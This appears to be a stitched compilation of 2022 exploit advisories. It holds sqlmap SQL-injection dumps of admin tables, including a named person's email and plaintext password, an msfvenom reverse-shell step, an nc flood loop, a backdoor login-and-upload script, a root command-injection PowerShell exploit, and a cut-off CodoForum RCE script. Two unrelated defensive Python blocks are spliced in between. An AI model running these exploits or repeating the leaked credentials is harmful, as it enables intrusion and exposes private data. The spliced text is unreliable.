<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : wvidesk.com │ │ │<br />│ Vendor : WVIDesk │ │ │<br />│ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, │<br />│ Resume Builder v. 1.0 │ │ events and scholarships. │<br />│ Vuln Type: Remote SQL Injection │ │ │<br />│ Method : GET │ │ │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. 
│<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost, Carlos132sp, ProGenius <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'listed' is vulnerable.<br /><br />---<br />Parameter: listed (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD<br /><br /> Type: time-based blind<br /> Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)<br /> Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#<br />---<br /><br />[+] Starting the Attack<br /><br />sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: PHP, Apache, PHP 5.6.40<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[23:03:36] [INFO] fetching current database<br />[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'<br />current database: 'livexzfv_jobdreamers'<br /><br /><br />fetching tables for database: 'livexzfv_jobdreamers'<br /><br />Database: livexzfv_jobdreamers<br />[56 tables]<br 
/><br /><br />fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'<br /><br />Database: livexzfv_jobdreamers<br />Table: siteadminuser<br />[8 columns]<br />+----------+--------------+<br />| Column | Type |<br />+----------+--------------+<br />| aflag | varchar(2) |<br />| desig | varchar(200) |<br />| enet | varchar(450) |<br />| fullname | varchar(450) |<br />| id | int(10) |<br />| pw | varchar(25) |<br />| role | int(10) |<br />| users | varchar(200) |<br />+----------+--------------+<br /><br /><br />fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'<br /><br /><br 
/>Database: livexzfv_jobdreamers<br />Table: siteadminuser<br />[1 entry]<br />+-------+------------+--------------------+------------------------+----+------+------+-------+<br />| aflag | desig | enet | fullname | id | pw | role | users |<br />+-------+------------+--------------------+------------------------+----+------+------+-------+<br />| Y | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir |<br />+-------+------------+--------------------+------------------------+----+------+------+-------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>[+] Credits: Yehia Elghaly (aka Mrvar0x) <br />[+] Website: https://mrvar0x.com/<br />[+] Source: https://mrvar0x.com/2022/07/21/pcprotect-endpoint-tampering-exploit/<br /><br />Vendor:<br />=============<br />www.pcprotect.com<br /><br /><br />Product:<br />===========<br />PCProtect Endpoint Protection v5.17.470<br /><br />PCProtect is a malware detection and antivirus scanner. It uses advanced heuristics and a massive, continuously updated database to detect malware files on Windows, macOS, and Android devices. It also has an iOS app.<br />PCProtect also includes additional features, including:<br />Web shield - Virtual private network (VPN) - Data breach monitor - Identity theft protection - System optimizer- Password manager- And much more…<br /><br /><br />Vulnerability Type:<br />===================<br />Missing Tamper Protection<br />Incorrect Authorization<br /><br />CVE Reference:<br />==============<br />N/A<br /><br /><br />Security Issue:<br />================<br />PCProtect Antivirus prior to version 5.17.470 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling PCProtect Antivirus and the protection offered by it. 
It also leads to privilege escalation to SYSTEM.<br /><br />This can occur by modifying a specific registry key.<br />Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityService<br />Change the ImagePath value to point to a malicious executable.<br /><br /><br />Exploit/POC:<br />=============<br />Create a malicious executable through msfvenom<br /><br />msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exe<br /><br />Modify (ImagePath) with the path of the malicious executable - Restart<br /><br /><br />Network Access:<br />===============<br />Local<br /><br /><br />Severity:<br />=========<br />High<br /><br /><br />[+] Disclaimer<br />The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />Mrvar0x<br /></code></pre>
<pre><code># Exploit Title: CVE-2022-35911 - Patlite Overflow.<br /># Date: 2022-07-07<br /># Exploit Author: Samy Younsi - Necrum Security Labs<br /># Vendor Homepage: https://www.patlite.co.jp<br /># Software Link: https://www.patlite.co.jp/product/detail0000021462.html<br /># Version: Versions 1.46 and below are affected<br /># Tested on: CentOS & Ubuntu<br /># CVE : CVE-2022-35911<br /><br /><br />#!/bin/bash<br /><br />IP="192.168.1.101"<br />PORT="80"<br /><br />for i in {0..1000};<br />do<br /> echo "[$i]: ";<br /> echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc "$IP" "$PORT";<br />done > /dev/null 2>&1<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : sangvish.com │ │ │<br />│ Vendor : SangVish Technologies │ │ │<br />│ Software : Marty Marketplace Multi Vendor │ │ Open Source Marketplace PHP script for │<br />│ Ecommerce Script v1.2 │ │ eCommerce marketplace platforms │<br />│ Vuln Type: Remote SQL Injection │ │ in the market │<br />│ Method : GET │ │ │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. 
│<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br /> Special Greetz to The Lebanese National Basketball Team for the results of<br /> the FIBA Asia Cup<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />GET parameter 'attributes[]' is vulnerable<br />---<br />Parameter: attributes[] (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)<br />---<br /><br /><br />Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6<br /><br /><br />[+] Starting the Attack<br /><br />sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch<br /><br /><br />[+] fetching current database<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.6<br />[INFO] retrieved: 'garudan_buy2marty'<br />current database: 'garudan_buy2marty'<br 
/><br /><br />[+] fetching tables for database: 'garudan_buy2marty'<br /><br />Database: garudan_buy2marty<br />[105 tables]<br /><br /><br />[+] fetching columns for table 'users' in database 'garudan_buy2marty'<br /><br />Database: garudan_buy2marty<br />Table: users<br />[15 columns]<br /><br />+-------------------+---------------------+<br />| Column | Type |<br />+-------------------+---------------------+<br />| avatar_id | int(10) unsigned |<br />| created_at | timestamp |<br />| email | varchar(191) |<br />| email_verified_at | timestamp |<br />| first_name | varchar(191) |<br />| id | bigint(20) unsigned |<br />| last_login | timestamp |<br />| last_name | varchar(191) |<br />| manage_supers | tinyint(1) |<br />| password | varchar(191) |<br />| permissions | text |<br />| remember_token | varchar(100) |<br />| super_user | tinyint(1) |<br />| updated_at | timestamp |<br />| username | varchar(60) |<br />+-------------------+---------------------+<br /><br /><br />[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 
'garudan_buy2marty'<br /><br />Database: garudan_buy2marty<br />Table: users<br />[1 entry]<br /><br />+----+----------+--------------------------------------------------------------+------------+-------------+<br />| id | username | password | super_user | permissions |<br />+----+----------+--------------------------------------------------------------+------------+-------------+<br />| 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1 | NULL |<br />+----+----------+--------------------------------------------------------------+------------+-------------+<br /> Possible algorithms: bcrypt $2*$, Blowfish (Unix)<br /><br /><br />[-] Done<br /></code></pre>
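The two CraCkEr advisories above (the 'listed' parameter of Expert X and the 'attributes[]' parameter of Marty) report the same three sqlmap techniques: boolean-based blind, error-based and time-based blind. As an added example that is not part of either advisory, the Python below scans access-log lines for those payload shapes after percent-decoding each query parameter, so a defender can spot the enumeration in server logs; the sample log lines, client addresses and the signature list are my own constructions.

```python
import re
from typing import Dict, List, NamedTuple, Tuple
from urllib.parse import parse_qsl

# One Apache/nginx "combined" access-log line: client, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures for the three sqlmap techniques both advisories report. Error- and time-based
# forms are checked first because they are the most specific; the boolean tautology comes last.
SIGNATURES = [
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("error-based", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("time-blind", re.compile(r"\bBENCHMARK\s*\(\s*\d+", re.I)),
    ("time-blind", re.compile(r"\bSLEEP\s*\(\s*\d+", re.I)),
    ("boolean-blind", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I)),
    ("boolean-blind", re.compile(r"\bCASE\s+WHEN\b.+\bTHEN\b.+\bELSE\b", re.I | re.S)),
]


class Finding(NamedTuple):
    ip: str
    ts: str
    param: str
    techniques: Tuple[str, ...]
    status: str
    ua: str  # kept for context only: sqlmap --random-agent makes the agent string useless as a signal


def classify_payload(value: str) -> Tuple[str, ...]:
    """Techniques whose signature appears in one URL-decoded parameter value, in signature order."""
    hits: List[str] = []
    for technique, pattern in SIGNATURES:
        if pattern.search(value) and technique not in hits:
            hits.append(technique)
    return tuple(hits)


def scan_request_target(target: str) -> List[Tuple[str, Tuple[str, ...]]]:
    """Split '/path?a=b&c=d', percent-decode every value (%27 -> ', %5B%5D -> []) and classify it."""
    _, _, query = target.partition("?")
    results = []
    for param, value in parse_qsl(query, keep_blank_values=True):
        techniques = classify_payload(value)
        if techniques:
            results.append((param, techniques))
    return results


def scan_log(lines) -> List[Finding]:
    """Return one Finding per (request, parameter) pair that carries an injection signature."""
    findings: List[Finding] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:  # unparsable line: skip it rather than abort the whole scan
            continue
        for param, techniques in scan_request_target(m["target"]):
            findings.append(Finding(m["ip"], m["ts"], param, techniques, m["status"], m["ua"]))
    return findings


def summarize_by_client(findings) -> Dict[str, int]:
    """Count flagged requests per client address; a burst from one address is the sqlmap pattern."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.ip] = counts.get(f.ip, 0) + 1
    return counts


# Constructed sample log: the payload shapes are the ones quoted in the advisories, percent-encoded
# as a client would send them; the addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.9 - - [21/Jul/2022:23:03:36 +0000] "GET /companies?listed=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Jul/2022:23:03:37 +0000] "GET /companies?listed=1%27%20AND%206926%3D6926%20AND%20%27ZFlv%27%3D%27ZFlv HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Jul/2022:23:03:38 +0000] "GET /companies?listed=1%27%20OR%208793%3DBENCHMARK(5000000%2CMD5(0x6643566c))%23 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jul/2022:23:10:01 +0000] "GET /buy2marty/products?attributes%5B%5D=6%20AND%20GTID_SUBSET(CONCAT(0x717a7a6271%2C(SELECT%20(ELT(8162%3D8162%2C1)))%2C0x716b6a7071)%2C8162) HTTP/1.1" 500 812 "-" "sqlmap/1.6"
198.51.100.7 - - [21/Jul/2022:23:10:02 +0000] "GET /buy2marty/products?attributes%5B%5D=6%20AND%20(SELECT%208488%20FROM%20(SELECT(SLEEP(5)))dSkn) HTTP/1.1" 200 4410 "-" "sqlmap/1.6"
this line is deliberately malformed and must be skipped
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f.ip} [{f.ts}] param={f.param!r} technique={','.join(f.techniques)} status={f.status}")
    print(summarize_by_client(found))
```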
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/8b470931114527b4dce42034a95ebf46.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Eclipse.h<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Eclipse<br />Type: PE32<br />MD5: 8b470931114527b4dce42034a95ebf46<br />Vuln ID: MVID-2022-0625<br />Disclosure: 07/21/2022<br />Description: The malware listens on TCP port 6210 and authentication is required. However, the backdoor accepts any USER name for authentication and the password "R-M" is weak and hardcoded within the PE file. Unpacking the UPX-packed executable easily reveals the cleartext hardcoded password.<br /><br />00437590 dd 3 ; Len<br />00437590 db 'R-M',0 ; Text<br />0043759C _str_6210 dd 0FFFFFFFFh ; _top<br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 6210<br />220 Servidor FTP Temporal Ver. 2.1 por Vlad<br />USER malvuln<br />331 Password required for malvuln.<br />PASS R-M<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />MKD HATE<br />257 'C:\HATE': directory created.<br />CWD HATE<br />250 CWD command successful. "C:/HATE/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,213,228).<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br /># passive-mode data port announced in the 227 reply above: 213*256 + 228 = 54756<br />MALWARE_HOST="192.168.18.125"<br />PORT=54756<br />DOOM="DOOM_SM.exe"<br /><br />def doit():<br />    s=socket(AF_INET, SOCK_STREAM)<br />    s.connect((MALWARE_HOST, PORT))<br /><br />    # stream the file in chunks, each sent exactly once; sendall() blocks until a chunk is fully written<br />    with open(DOOM, "rb") as f:<br />        chunk = f.read(4096)<br />        while chunk:<br />            s.sendall(chunk)<br />            chunk = f.read(4096)<br /><br />    s.close()<br /><br />    print("By Malvuln")<br /><br />if __name__=="__main__":<br />    doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code><#SpaceLogic.ps1<br /><br />Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit<br /><br /><br />Vendor: Schneider Electric SE<br />Product web page: https://www.se.com<br /> https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/<br /> https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware<br />Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)<br /> formerly known as C-Bus Wiser Home Controller MK2<br /> V1.31.460 and prior<br /> Firmware: 604<br /><br />Summary: SpaceLogic C-Bus Home Automation System<br />Lighting control and automation solutions for<br />buildings of the future, part of SpaceLogic.<br />SpaceLogic C-Bus is a powerful, fully integrated<br />system that can control and automate lighting<br />and many other electrical systems and products.<br />The SpaceLogic C-Bus system is robust, flexible,<br />scalable and has proven solutions for buildings<br />of the future. Implemented for commercial and<br />residential buildings automation, it brings<br />control, comfort, efficiency and ease of use<br />to its occupants.<br /><br />Wiser Home Control makes technologies in your<br />home easy by providing seamless control of music,<br />home theatre, lighting, air conditioning, sprinkler<br />systems, curtains and shutters, security systems...<br />you name it. Usable anytime, anywhere even when<br />you are away, via preset shortcuts or direct<br />control, in the same look and feel from a wall<br />switch, a home computer, or even your smartphone<br />or TV - there is no wiser way to enjoy 24/7<br />connectivity, comfort and convenience, entertainment<br />and peace of mind homewide! 
<br /><br />The Wiser 2 Home Controller allows you to access<br />your C-Bus using a graphical user interface, sometimes<br />referred to as the Wiser 2 UI. The Wiser 2 Home<br />Controller arrives with a sample project loaded<br />and the user interface accessible from your local<br />home network. With certain options set, you can<br />also access the Wiser 2 UI from anywhere using<br />the Internet. Using the Wiser 2 Home Controller<br />you can: control equipment such as IP cameras,<br />C-Bus devices and non C-Bus wired and wireless<br />equipment on the home LAN, schedule events in<br />the home, create and store scenes on-board, customise<br />a C-Bus system using the on-board Logic Engine,<br />monitor the home environment including C-Bus and<br />security systems, control ZigBee products such<br />as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.<br /><br />Examples of equipment you might access with Wiser<br />2 Home Controller include lighting, HVAC, curtains,<br />cameras, sprinkler systems, power monitoring, Ulti-ZigBee,<br />multi-room audio and security controls.<br /><br />Desc: The home automation solution suffers from<br />an authenticated OS command injection vulnerability.<br />This can be exploited to inject and execute arbitrary<br />shell commands as the root user via the 'name' GET<br />parameter in the 'delsnap.pl' Perl/CGI script which is<br />used for deleting snapshots taken from the webcam.<br /><br />=========================================================<br />/www/delsnap.pl:<br />----------------<br /><br />#!/usr/bin/perl<br />use IO::Handle;<br /><br /><br />select(STDERR);<br />$| = 1;<br />select(STDOUT);<br />$| = 1;<br /><br />#print "\r\n\r\n";<br /><br />$CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';<br />use CGI;<br /><br />my $PROGNAME = "delsnap.pl";<br /><br />my $cgi = new CGI();<br /><br />my $name = $cgi->param('name');<br />if ($name eq "list") {<br />    print "\r\n\r\n";<br />    print "DATA=";<br />    print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;<br />    exit(0);<br />}<br />if ($name eq "deleteall") {<br />    print "\r\n\r\n";<br />    print "DELETINGALL=TRUE&";<br />    print `rm /mnt/microsd/clipsal/ugen/imgs/*`;<br />    print "COMPLETED=true\n";<br />    exit(0);<br />}<br />#print "name $name\n";<br />print "\r\n\r\n";<br />my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";<br /><br />unlink $filename or die "COMPLETED=false\n";<br /><br />print "COMPLETED=true\n";<br /><br />=========================================================<br /><br />Tested on: Machine: OMAP3 Wiser2 Board<br /> CPU: ARMv7 revision 2<br /> GNU/Linux 2.6.37 (armv7l)<br /> BusyBox v1.22.1<br /> thttpd/2.25b<br /> Perl v5.20.0<br /> Clipsal 81<br /> Angstrom 2009.X-stable<br /> PICED 4.14.0.100<br /> lighttpd/1.7<br /> GCC 4.4.3<br /> NodeJS v10.15.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5710<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php<br /><br />Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf<br /><br />CVE ID: CVE-2022-34753<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753<br /><br /><br />27.03.2022<br /><br />#><br /><br /><br />$host.UI.RawUI.ForegroundColor = "Green"<br />if ($($args.Count) -ne 2) {<br /> Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")<br />} else {<br /> $ip = $args[0]<br /> $cmd = $args[1]<br /> $cmdinj = "/delsnap.pl?name=|$cmd"<br /> Write-Host("`nSending command '$cmd' to $ip`n")<br /> #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj<br /> curl -v $ip$cmdinj<br />}<br /><br /><br /><#PoC<br /><br />PS C:\> 
.\SpaceLogic.ps1<br /><br />Usage: .\SpaceLogic.ps1 [IP] [CMD]<br /><br /><br />PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"<br /><br />Sending command 'uname -a;id;pwd' to 192.168.1.2<br /><br />VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload<br />VERBOSE: received 129-byte response of content type text/html; charset=utf-8<br /><br /><br />StatusCode : 200<br />StatusDescription : OK<br />Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux<br /> uid=0(root) gid=0(root)<br /> /custom-package<br /> <br />RawContent : HTTP/1.1 200 OK<br /> Access-Control-Allow-Origin: *<br /> Connection: keep-alive<br /> Content-Length: 129<br /> Content-Type: text/html; charset=utf-8<br /> Date: Thu, 30 Jun 2022 14:48:43 GMT<br /> ETag: W/"81-LTIWJvYlDBYAlgXEy...<br />Forms : {}<br />Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html; <br /> charset=utf-8]...}<br />Images : {}<br />InputFields : {}<br />Links : {}<br />ParsedHtml : mshtml.HTMLDocumentClass<br />RawContentLength : 129<br /><br /><br /><br /><br />PS C:\><br />#><br /></code></pre>
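The delsnap.pl listing above hands the 'name' parameter straight to the filesystem and shells out for listing and bulk deletion. As an added example, written here and not taken from Schneider Electric's firmware or from the advisory, the Python below is a hardened equivalent of that handler: 'name' is whitelisted to a single plain path component, every action uses filesystem calls instead of a shell, and the responses reuse the DATA= and COMPLETED= strings the original prints. The CGI plumbing is left out, and make_demo_dir with its sample file names is a constructed test fixture.

```python
import re
import tempfile
from pathlib import Path

# Directory the advisory's delsnap.pl operates on (taken from the listing above).
SNAPSHOT_DIR = Path("/mnt/microsd/clipsal/ugen/imgs")

# A snapshot name must be exactly one plain path component: it starts with a letter or digit
# (so '.', '..' and dot-files are out) and contains only [A-Za-z0-9_.-]. '/', NUL, spaces and
# shell metacharacters such as '|', ';', '`' or '$' can never pass, whatever the transport.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def handle_delsnap(name: str, snapshot_dir=SNAPSHOT_DIR):
    """Hardened equivalent of delsnap.pl's three actions: 'list', 'deleteall' or delete one file.

    Returns (ok, body); body reuses the key=value strings the original script prints.
    Nothing here runs through a shell, so no value of `name` can become a command.
    """
    base = Path(snapshot_dir)
    if name == "list":
        names = sorted(p.name for p in base.iterdir() if p.is_file())
        return True, "DATA=" + "\n".join(names)
    if name == "deleteall":
        for p in base.iterdir():
            if p.is_file() and not p.is_symlink():
                p.unlink()
        return True, "DELETINGALL=TRUE&COMPLETED=true"
    if not SAFE_NAME.fullmatch(name):
        # The PoC's '|uname -a;id;pwd', as well as '../x', '..' and '' all stop here.
        return False, "COMPLETED=false&REASON=invalid_name"
    target = base / name
    # Defence in depth after the whitelist: only a regular, non-symlink file that sits
    # directly inside the snapshot directory may be removed.
    if target.parent != base or target.is_symlink() or not target.is_file():
        return False, "COMPLETED=false&REASON=not_found"
    target.unlink()
    return True, "COMPLETED=true"


def make_demo_dir(names=("snap1.jpg", "snap2.jpg")) -> str:
    """Constructed test fixture: a throwaway snapshot directory holding empty image files."""
    d = tempfile.mkdtemp(prefix="snapshots-")
    for n in names:
        (Path(d) / n).touch()
    return d


if __name__ == "__main__":
    demo = make_demo_dir()
    for probe in ("list", "|uname -a;id;pwd", "../../etc/passwd", "snap1.jpg",
                  "snap1.jpg", "deleteall", "list"):
        print(f"name={probe!r:24} -> {handle_delsnap(probe, demo)}")
```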
<pre><code># Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)<br /># Date: 06/07/2022<br /># Exploit Author: Krish Pandey (@vikaran101)<br /># Vendor Homepage: https://codoforum.com/<br /># Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip<br /># Version: CodoForum v5.1<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2022-31854<br /><br />#!/usr/bin/python3<br /><br />import requests<br />import time<br />import optparse<br />import random<br />import string<br /><br />banner = """<br /> ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _ <br /> / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || | <br />| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ <br />| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _|<br /> \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_| <br />"""<br /><br />print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")<br />print(banner)<br />print("\nExploit found and written by: @vikaran101\n")<br /><br />parser = optparse.OptionParser()<br />parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')<br />parser.add_option('-u', '--username', action="store", dest='username', help='admin username')<br />parser.add_option('-p', '--password', action="store", dest='password', help='admin password')<br />parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')<br />parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')<br /><br />options, args = parser.parse_args()<br /><br />proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}<br /><br />if not options.target or not options.username or not options.password or not options.ip or not options.port:<br /> print("[-] Missing arguments!")<br /> print("[*] Example usage: ./exploit.py -t [target url] -u 
